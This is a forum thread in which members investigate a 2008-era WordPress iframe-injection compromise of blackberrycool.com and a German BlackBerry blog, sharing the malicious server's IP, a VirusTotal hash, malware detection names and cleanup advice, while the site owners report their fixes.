Malware Warning

Try searching BlackBerryCool on Google then clicking the link... what's up with that?

Lol! Google is now telling me where not go to

hahahahaa

I saw that yesterday. Must we all pass some Googly test now?

Nice to see someone appointing themselves as the Internet Morality Police. Microsoft was really slacking in this area...

Tgtbt

Same thing for der-blackberry-blog.de (german BB blog)..

Google normally displays that warning for sites that have been compromised and may be running exploits and malware. Or sites that deliberately download malware. There are plenty of both.

There is a problem with blackberrycool.com. I went to the site in my unpatched vm and a malware file tried to load. I'm still investigating it, but if someone knows how I can contact the site owner, please PM me. It looks like their WordPress may have been attacked. In the meantime, I'd suggest not visiting the site until it's fixed.

I'll check the German blog in a bit also.

thats just funny.

I had that attack hit me as well.

No offense, but it really is not funny. There is no humor in having a site hacked, or getting infected from visiting a hacked site. I'm sure the site owners won't think it's funny to have to shut down their sites while it gets cleaned up and patched.

The German blog has the same probem. See these Google results for the Chinese IP address.

61.155.8.157 - Google Search

Somehow iframes with links to a URL on that IP address have been injected on the Blackberrycool.com and the blog pages. The hidden iframe goes to the malicious URL where an obfuscated javascript exploit loads the malware file. I will have more info on it later. I'm trying to contact the owner of blackberrycool and will have a German malware researcher I know try to contact the blog owner.

It's possible the exploit doesn't work on fully patched PCs, but I wouldn't risk it. The exploit definitely works on my Windows XP totally unpatched virtual machine.

Did you find out how it happened? Was from a WordPress vulnerability?

I got a copy of the malicious javascript, haven't had time to check it just yet.

Does WordPress open a back door to this type of stuff?

There have been a lot of vulnerabilities found in WordPress. I just read something about exploits of the latest version of WordPress. I'll try to find it in a bit.

Detective Daphne on the case! You are good!

Secunia has a long list of vulnerabilities in WordPress.

Search Advisory, Vulnerability, and Virus Database - Secunia

Both of these sites have Google's AdSense, it may be this one.

AdSense-Deluxe 0.x (plugin for WordPress) - Vulnerability Report - Secunia

Heh... this is what gets my blood racing because it makes me angry that there is so much hacking, exploits and such that cause so many problem for innocent people, site owners and users.

Ok, good news... it looks like Blackberrycool.com has removed the malicious code from the homepage. I didn't check the entire site. Hopefully whatever allowed the attack has been patched because sometimes sites will be attacked repeatedly.

The malicious javascript on the Chinese IP address is detected by some but not all Anti-virus programs. Scan report of 32 AV scanners here:

Virustotal. MD5: 00e5351eb184f8d920105ec149da9e61 Downloader VBS/Gen_troj.A Generic.XPL.ADODB.0E3AA240

There are about 13 malware files dropped in a vulnerable system by visiting the sites, some detected by the AVs, some not. Here's a few of the names: Worm.Win32.Socks.by, Trojan-Downloader.Win32.Delf.gti, Trojan-Downloader.Win32.Agent.neo, Trojan-Downloader.Win32.Injecter.ek.

Anyone who visited either site recently (don't know how long they've been hacked), should run a full av scan with updated definitions, and maybe a second scan with one of the online AV scanners.

Trend Micro HouseCall - Free Online Virus and Spyware Scan - Trend Micro USA
ewido - anti-spyware and anti-malware solutions
Free Virus Scan - Kaspersky Lab

Or if you think you you are infected and need more help, PM me.

The German blog is still compromised. If anyone here speaks German, maybe you could try to contact the site owner? So far, I haven't had any luck, and I don't read or speak German. There is contact information here:

Der-blackberry-blog.de - Der Blackberry Blog

Any of you folks with websites, it's very important to keep your server OS and server-side software patched and updated. That includes WordPress, any php apps, forums, everything. Just like an unpatched home PC can be compromised, websites and web servers can be compromised when not kept updated and secured. In recent months, it's become an epidemic, with even well known sites being hit. Examples here:

IT Business
Hackers expand massive IFRAME attack to prime sites - Network World
Compromised web sites serve more malware than malicious ones

Edit to add... when Google shows that warning for a site, it should be taken seriously, not as a joke.

Ye, I'll let him know asap.

Thanks Daphne

Thank you very much.

Done, used the form on the blog to contact him (using a linux OS >.> ), let's hope he reads it too.
Would've let him know earlier but I couldn't have explained it very well...just directed him to this thread now.

this is the 100 webpage exploit? or 10000 or something that within hrs spread to 200k+ ?

like 2-3 weeks ago. i imagine it going to hit more sites.

Hey guys,

Thanks for all the heads up we got on this today. I don't do any of the codey/design stuff myself, but our site manager spent the better part of today trying to figure out what's going on. From his grumblings, I've managed to gather that Google is pointing to some directories that don't exist anymore (old job board, before a revamp) as the source of the malicious code. We've taken down a few of our third party add-ons, such as text link ads in the hope that it might fix the problem. Over the last month or so, I've noticed a few spammish things sneaking onto the site, but we've been fairly quick to squash 'em.

Daphne, thanks a ton for your poking around, I'm sure it'll help us figure out what's going on. My best guess is that there's a hole in our version of WordPress, and we just need to update to the latest one.

If anyone has any further info to volunteer, feel free to contact me directly at simon at blackberry cool dot com.

Hi Simon,

Thanks for posting. The malicious hidden iframe link was right on the homepage, but it's gone now. Kudos to the site manager for getting it taken care of quickly. I did read some info about even the latest version of WordPress, 2.5, being hacked. Some info here:

WordPress › Support » WordPress 2.5 Hacked

This one was hacked with the same malicious iframe with the IP to China.

WordPress › Support » Wordpress 2.5 site hacked!

Not sure -- just read this today. No doubt there will be more. Site hacking and malware are big money makers now, run by organized crime.

SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

aye, it all points to about 6 different places in china, it infected about 200,000 sites about 2-3 weeks ago.

Cyber-attack launched from 10,000 web pages - Security - iTnews Australia

Great, thanks again!! Using a linux os was a good way to go there.

Least I could do, you did all the work ;P
For common good (read: to keep myself from spamming) I have now decided that 4 am is a good time to hit the hay.
-sneaks out-

I don't know how it happened, just that Kazpersky (sp.?) blocked it. BTW, thanks again for that recommendation!

I know lots of people that are simply banning any Chinese address from accessing their content. Sucks to be blocked, but this attack is getting too common, and with the Chinese authorities being the complete joke that they are, site owners are left with few options. Especially those operating their web sites on a shoestring budget, on a server sitting in their bedroom closet.

All fixed! The Google warning's been lifted after same tweaking last night. Thanks again everyone who helped out.

I just noticed the Google warning is no longer there. But the blog der-blackberry-blog.de still has the warning.

Working on my blog atm. We think the database is the problem. The blog is now offline. Thank you for your message.

Der BlackBerry-Blog

UPDATE: Still fixing the problem. The blog is online due testing. Please dont visite this site at the moment.

Hi funrun,

I'm sorry your blog got hacked, but I'm glad to hear you are working on it.